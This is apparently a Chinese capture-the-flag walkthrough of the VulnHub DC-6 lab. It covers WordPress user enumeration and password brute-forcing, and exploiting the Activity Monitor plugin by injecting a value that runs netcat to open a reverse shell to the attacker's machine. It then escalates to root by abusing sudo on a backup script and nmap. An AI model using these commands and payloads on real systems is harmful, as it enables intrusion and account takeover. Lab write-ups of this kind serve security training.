文章目錄
- 一、環境搭建
- 二、滲透流程
- 三、思路總結
一、環境搭建
DC-6下載下傳位址:https://download.vulnhub.com/dc/DC-6.zip
kali:192.168.144.148
DC-6:192.168.144.154
選擇
靶機描述:
後面會用到
帶k01的密碼
通路192.168.144.154,位址欄上方的ip變成了域名http://wordy,添加host檔案
二、滲透流程
nmap -A -T5 -sV -sT -p- 192.168.144.154
1、80端口
思路:
2、22端口目錄掃描:dirb、gobuster、dirsearch等工具;
web站點資産識别:goby、whatweb等;
web站點功能頁面;
分析網頁源代碼;
……
ssh爆破、有賬号密碼資訊進行遠端登入
……
目錄掃描結果:
http://wordy/wp-login.php #背景管理頁面
http://wordy/wp-includes/ #網站目錄
#指紋探測
whatweb http://wordy
web站點是Wordpress CMS
思路:
1、Wordpress版本漏洞
2、Wordpress插件漏洞
3、背景位址,賬号密碼爆破
#枚舉網站使用者
wpscan --url http://wordy -e u
#利用枚舉到的網站使用者名進行爆破
#篩選出有k01的密碼儲存到新的字典passwords.txt中
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
wpscan --url http://wordy -U "admin","mark","jens","sarch","graham" -P passwords.txt
#ssh登入失敗
ssh [email protected]
登入背景管理頁面
使用者名:密碼 mark:helpdesk01
管理頁面位址:http://wordy/wp-login.php
#Activity monitor元件
searchsploit activity monitor
#後兩個指令注入和遠端代碼執行都可以加以利用
#檢視45274.html
指令1:cat /usr/share/exploitdb/exploits/php/webapps/45274.html
指令2:file:///usr/share/exploitdb/exploits/php/webapps/45274.html
#修改45274.html
cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html
vim 45274.html
#修改為如下内容
#kali開啟監聽
nc -lnvp 4444
#浏覽器通路45274.html,點選submit,反彈shell未成功
點選Lookup按鈕,抓包
#burpsuite抓包
修改指令為127.0.0.1 | nc -e /bin/sh 192.168.144.148 4444
反彈shell成功
#利用python切換到bash環境
python -c 'import pty;pty.spawn("/bin/bash")'
cat /home/mark/stuff/things-to-do.txt
#該檔案下存在賬号密碼:graham - GSo7isUM1D4
#利用擷取的賬号密碼登入
ssh [email protected]
sudo -l
cat /home/jens/backups.sh
#backups.sh檔案内容是對網站的打包指令,作用是備份網站根目錄。
sudo -l
#jens使用者不需要密碼就可以執行backups.sh檔案
echo "/bin/bash" >> backups.sh
sudo -u jens ./backups.sh
sudo -l #顯示目前使用者可以用sudo執行哪些指令
#在jens的shell下,可以在不需要密碼的情況下,以root的身份權限執行nmap
#利用nmap的--script參數執行反彈shell腳本
echo 'os.execute("/bin/sh")' > getShell.nse
sudo nmap --script=./getshell.nse
這裡有個問題:擷取到root權限之後,頁面輸入的指令看不見,但是可以執行。
三、思路總結
1、資訊收集
2、暴力破解登入Wordpress背景
3、利用Wordpress CMS元件漏洞反彈shell
4、ssh遠端登入後尋找可以執行sudo指令的操作
5、寫入nmap反彈shell腳本